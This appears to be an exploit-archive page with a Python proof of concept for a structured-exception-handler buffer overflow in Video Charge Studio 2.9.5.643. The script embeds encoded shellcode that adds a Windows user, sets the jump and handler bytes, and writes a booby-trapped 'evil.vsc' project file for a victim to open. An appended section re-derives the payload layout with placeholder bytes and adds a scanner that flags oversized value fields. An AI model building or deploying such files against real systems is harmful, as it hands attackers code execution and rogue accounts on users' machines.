
[local exploits] - Video Charge Studio <= 2.9.5.643 (.vsc) Buffer Overflow (SEH)

Posted on 06 December 2010

=============================================================
Video Charge Studio <= 2.9.5.643 (.vsc) Buffer Overflow (SEH)
=============================================================

#!/usr/bin/env python3
# Exploit Title: Video Charge Studio <= 2.9.5.643 (.vsc) Buffer Overflow (SEH)
# Date: 12/05/2010
# Author: xsploitedsec
# URL: http://www.x-sploited.com/
# Contact: xsploitedsecurity [at] x-sploited.com
# Software Link: http://www.videocharge.com/download/VideoChargeStudio_Install.exe
# Version: <= 2.9.5.643 (Latest)
# Tested on: Windows XP SP3 (Physical machine)
# CVE: N/A
#
### Software Description: ###
# Videocharge Studio is video editing software intended for users who regularly
# work with video, create Internet video galleries and convert video files.
# Videocharge Studio includes all features for video editing: video converting,
# splitting video into parts, joining several video files into a single one,
# adding a watermark to video or images (adding a logo to video or photo),
# embedding an image into a video file, creating video from several images and
# editing audio. Videocharge Studio can also edit video without re-encoding.
#
### Exploit information: ###
# Video Charge Studio is prone to a buffer overflow when parsing the "Filename"
# value field of a malicious .vsc file (in the file this script generates, that
# is the value attribute of the <Value name="Name" type="8" value="..."> element).
# An oversized value overwrites a structured exception handler record, so an
# attacker could trick a user into loading a specially crafted .vsc file to
# execute arbitrary code on the user's PC without their consent.
#
### Shouts: ###
# kaotix, sheep, deca, havalito, corelanc0d3r/corelan team, exploit-db crew, packetstormsecurity
#
# Have fun!
#
# "When you know that you're capable of dealing with whatever comes, you have the only
# security the world has to offer." -Harry Browne

import struct
import sys

about  = "=================================================\n"
about += " Video Charge Studio <= 2.9.5.643 (.vsc) BoF (SEH)\n"
about += " Author: xsploited security  URL: http://www.x-sploited.com/\n"
about += " Contact: xsploitedsecurity [at] gmail.com\n"
about += "=================================================\n"
print(about)

# msfpayload windows/adduser user=xsploited pass=sec EXITFUNC=seh R | msfencode -e x86/fnstenv_mov -c 1 -t perl
#   -b '\x00\x09\x0a\x0d\x3e\x3c\x26\x20\x21\x22\x23\x2a\x07' > /tmp/encoded.txt
# [*] x86/fnstenv_mov succeeded with size 302 (iteration=1)
shellcode = (
    b"\x6a\x46\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xce"
    b"\xcf\xb0\x91\x83\xeb\xfc\xe2\xf4\x32\x27\x39\x91\xce\xcf"
    b"\xd0\x18\x2b\xfe\x62\xf5\x45\x9d\x80\x1a\x9c\xc3\x3b\xc3"
    b"\xda\x44\xc2\xb9\xc1\x78\xfa\xb7\xff\x30\x81\x51\x62\xf3"
    b"\xd1\xed\xcc\xe3\x90\x50\x01\xc2\xb1\x56\x2c\x3f\xe2\xc6"
    b"\x45\x9d\xa0\x1a\x8c\xf3\xb1\x41\x45\x8f\xc8\x14\x0e\xbb"
    b"\xfa\x90\x1e\x9f\x3b\xd9\xd6\x44\xe8\xb1\xcf\x1c\x53\xad"
    b"\x87\x44\x84\x1a\xcf\x19\x81\x6e\xff\x0f\x1c\x50\x01\xc2"
    b"\xb1\x56\xf6\x2f\xc5\x65\xcd\xb2\x48\xaa\xb3\xeb\xc5\x73"
    b"\x96\x44\xe8\xb5\xcf\x1c\xd6\x1a\xc2\x84\x3b\xc9\xd2\xce"
    b"\x63\x1a\xca\x44\xb1\x41\x47\x8b\x94\xb5\x95\x94\xd1\xc8"
    b"\x94\x9e\x4f\x71\x96\x90\xea\x1a\xdc\x24\x36\xcc\xa4\xce"
    b"\x3d\x14\x77\xcf\xb0\x91\x9e\xa7\x81\x1a\xa1\x48\x4f\x44"
    b"\x75\x31\xbe\xa3\x24\xa7\x16\x04\x73\x52\x4f\x44\xf2\xc9"
    b"\xcc\x9b\x4e\x34\x50\xe4\xcb\x74\xf7\x82\xbc\xa0\xda\x91"
    b"\x9d\x30\x65\xf2\xa3\xab\x9e\xf4\xb6\xaa\x90\xbe\xad\xef"
    b"\xde\xf4\xba\xef\xc5\xe2\xab\xbd\x90\xe9\xbd\xbf\xdc\xfe"
    b"\xa7\xbb\xd5\xf5\xee\xbc\xd5\xf2\xee\xe0\xf1\xd5\x8a\xef"
    b"\x96\xb7\xee\xa1\xd5\xe5\xee\xa3\xdf\xf2\xaf\xa3\xd7\xe3"
    b"\xa1\xba\xc0\xb1\x8f\xab\xdd\xf8\xa0\xa6\xc3\xe5\xbc\xae"
    b"\xc4\xfe\xbc\xbc\x90\xe9\xbd\xbf\xdc\xfe\xa7\xbb\xd5\xf5"
    b"\xee\xe0\xf1\xd5\x8a\xcf\xba\x91"
)

# .vsc project wrapper around the overflowing field; the payload becomes the
# value attribute of <Value name="Name" type="8" value="...">
header = (
    b'<?xml version="1.0" encoding="Windows-1252" ?><config ver="2.9.5.643">\r\n'
    b'<cols name="Files"/>\r\n'
    b'<cols name="Profiles">\r\n'
    b'<Property name="Profile">\r\n'
    b'<cols name="Formats">\r\n'
    b'<Property name="Format">\r\n'
    b'<Value name="Name" type="8" value="'
)
footer = (
    b'"/>\r\n'
    b'</Property>\r\n'
    b'</cols>\r\n'
    b'</Property>\r\n'
    b'</cols>\r\n'
    b'</config>'
)

size = 824                                   # 824 junk bytes trigger the bof; the SEH record follows
payload  = b"\x90" * (size - len(shellcode)) # NOP sled, then the shellcode, filling the 824 bytes
payload += shellcode
payload += b"\xEB\x06\x90\x90"               # nSEH: jmp short +6, over the handler address
payload += struct.pack("<L", 0x61B8451C)     # SEH: universal pop/pop/ret in zlib1.dll (application path)
payload += b"\xe9\xe0\xfc\xff\xff"           # jmp back 800 bytes, into the NOP sled ahead of the shellcode

xsploit = header + payload + footer

print("[*] Creating .vsc file")
print("[*] Payload size = %d bytes" % len(payload))
try:
    # binary mode: the \r\n pairs and raw payload bytes must reach the file unchanged
    with open("evil.vsc", "wb") as out_file:
        out_file.write(xsploit)
    print("[*] Malicious vsc file created successfully")
    print("[*] Launch Video Charge Studio and load the file\n[*] Exiting...\n")
except OSError as e:
    print("[!] Error creating file: %s" % e)
    sys.exit(1)

# 1337db.com [2010-12-06]
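The following is an added example, not part of the original exploit or the vendor's software. It rebuilds the SEH record layout from the constants the exploit uses (824 bytes before the record, nSEH = EB 06, pop/pop/ret at 0x61B8451C, E9 jump of -800 back into the sled) with a constructed int3 placeholder standing in for the 302-byte encoded shellcode, and then checks what a practitioner would want to confirm before loading the file: that the short jump lands on the backward jump, that the backward jump lands inside the NOP sled, and that no byte from the msfencode bad-character list appears in the payload. It also shows the defender's side of the same file: a `<Value>` attribute this large stands out when triaging .vsc projects. The 256-byte triage threshold is an assumption.

```python
import re
import struct

# Constants taken from the exploit on this page.
OFFSET = 824                 # bytes before the SEH record
PPR = 0x61B8451C             # pop/pop/ret in zlib1.dll
BADCHARS = b"\x00\x09\x0a\x0d\x3e\x3c\x26\x20\x21\x22\x23\x2a\x07"  # msfencode -b list

# Constructed placeholder with the same length as the page's 302-byte payload;
# int3 (0xcc) is not a bad character, so the layout checks are unaffected.
STUB_SHELLCODE = b"\xcc" * 302

# The .vsc wrapper, decoded from the hex strings in the exploit.
HEADER = (b'<?xml version="1.0" encoding="Windows-1252" ?><config ver="2.9.5.643">\r\n'
          b'<cols name="Files"/>\r\n<cols name="Profiles">\r\n<Property name="Profile">\r\n'
          b'<cols name="Formats">\r\n<Property name="Format">\r\n'
          b'<Value name="Name" type="8" value="')
FOOTER = b'"/>\r\n</Property>\r\n</cols>\r\n</Property>\r\n</cols>\r\n</config>'


def build_payload(shellcode, offset=OFFSET, ppr=PPR, back=-800):
    """Same layout as the exploit: sled + shellcode up to `offset`, then the SEH
    record (nSEH = jmp short +6, SEH = p/p/r) and an E9 jump back into the sled."""
    payload = b"\x90" * (offset - len(shellcode)) + shellcode
    payload += b"\xeb\x06\x90\x90"                # nSEH: EB 06 skips the 4-byte handler address
    payload += struct.pack("<L", ppr)             # SEH: handler address, little-endian
    payload += b"\xe9" + struct.pack("<i", back)  # E9 rel32: jump back into the NOP sled
    return payload


def check_layout(payload, offset=OFFSET, ppr=PPR, badchars=BADCHARS):
    """Verify the control-flow chain the exploit relies on, without a debugger."""
    sled_len = len(payload) - len(payload.lstrip(b"\x90"))  # leading NOPs
    nseh = payload[offset:offset + 4]
    handler = struct.unpack("<L", payload[offset + 4:offset + 8])[0]
    short_target = offset + 2 + 6          # EB 06 is relative to the end of its 2-byte encoding
    rel32 = struct.unpack("<i", payload[short_target + 1:short_target + 5])[0]
    back_target = short_target + 5 + rel32  # E9 rel32 is relative to the end of its 5-byte encoding
    return {
        "nseh_ok": nseh[:2] == b"\xeb\x06",
        "seh_ok": handler == ppr,
        "short_jmp_target": short_target,
        "short_jmp_hits_e9": payload[short_target] == 0xE9,
        "back_jmp_target": back_target,
        "lands_in_sled": 0 <= back_target < sled_len,
        "badchars_found": sorted({b for b in payload if b in badchars}),
    }


VALUE_RE = re.compile(rb'<Value\s+name="([^"]*)"[^>]*?\bvalue="([^"]*)"')


def find_oversized_values(vsc, limit=256):
    """Defender-side triage: list <Value> elements whose value attribute exceeds
    `limit` bytes (assumed threshold; a real format name is a few dozen bytes)."""
    return [(m.group(1).decode("latin-1"), len(m.group(2)))
            for m in VALUE_RE.finditer(vsc) if len(m.group(2)) > limit]


if __name__ == "__main__":
    payload = build_payload(STUB_SHELLCODE)
    for key, val in check_layout(payload).items():
        print("%-18s %s" % (key, val))
    print("oversized values:", find_oversized_values(HEADER + payload + FOOTER))
```

With the page's constants the short jump lands at offset 832, where the E9 sits, and the backward jump lands at offset 37, inside the 522-byte sled; change `back` to a displacement that misses the sled and `lands_in_sled` turns false, which is the kind of off-by-N that otherwise only shows up as a crash in the debugger.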